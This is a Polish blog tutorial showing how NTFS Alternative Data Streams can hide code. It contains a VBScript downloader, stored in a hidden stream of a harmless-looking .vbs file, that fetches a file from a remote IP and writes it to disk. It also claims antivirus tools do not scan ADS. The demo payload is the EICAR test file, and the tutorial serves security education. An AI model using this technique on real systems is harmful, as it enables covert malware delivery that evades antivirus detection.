Złośliwość & ADS [Alternative Data Stream]

TL;DR

Jako jedno z zastosowań ADS (AlternativeData Stream) przedstawia pliki "Zone Identifier" będące rozszerzeniem dla pliku podstawowego, a zawierające metadane - na przykład informacje o pochodzeniu.

Przeglądarka internetowa jest w stanie oznaczyć plik odpowiednią wartością Zone-Identifier dzięki temu przy próbie otwarcia go z poziomu Windowsa otrzymamy taki komunikat bezpieczeństwa:

Kolejnym założeniem ADS miała być kompatybilność między systemami MacOS, a Windows ponieważ swego czasu Windows nie zapisywał metadanych o utworach muzycznych i kopiowanie utworów z jednego systemu na drugi kończyło się brakiem możliwości sprawdzenia autora, tytułu utworu, zespołu...lub nawet brakiem możliwości skopiowania danych ze względu na brak pełnej kompatybilności NTFS (Windows), a HFS (Apple).

Po więcej informacji o możliwościach rozszerzonych strumieni danych odsyłam do dokumentacji oraz kilku innych źródeł [1][2][3].

Jesteśmy w katalogu Workdir, który jest pusty:

Utworzymy sobie "czysty" pliczek *.vbs oraz eicar.txt (służy do testowania antywirusów - powinien zawsze być wykrywany):

No i jest wykrywany. :) 

A .vbs tworzy nam niewinne okienko.

Teraz zrobimy sobie ADS'iątko. Jest to tak proste jak dodanie dwukropka do nazwy już istniejącego pliku. Tym razem namieszamy!

I wpisujemy tam takie cosik:

dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://xxx.xxx.xx.164/eicar/eicar.txt", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "w:\WorkDir\eicar.txt", 2 '//overwrite
end with


Uruchamiamy i...

...downloader pobiera złośliwy plik. :)

Ciekawostka - ADS nie są skanowane przez anwywirusy/antymalware.

Myślę, że na dziś to by było wszystko. Zachęcam do własnoręcznego zgłębienia tematów i możliwości bo gdy dwa lata temu odkryłem ADS i jego właściwości to wszystko działało. Piszę ten artykuł dziś z nowymi screenshootami i skryptami...i jest tak samo.

ツ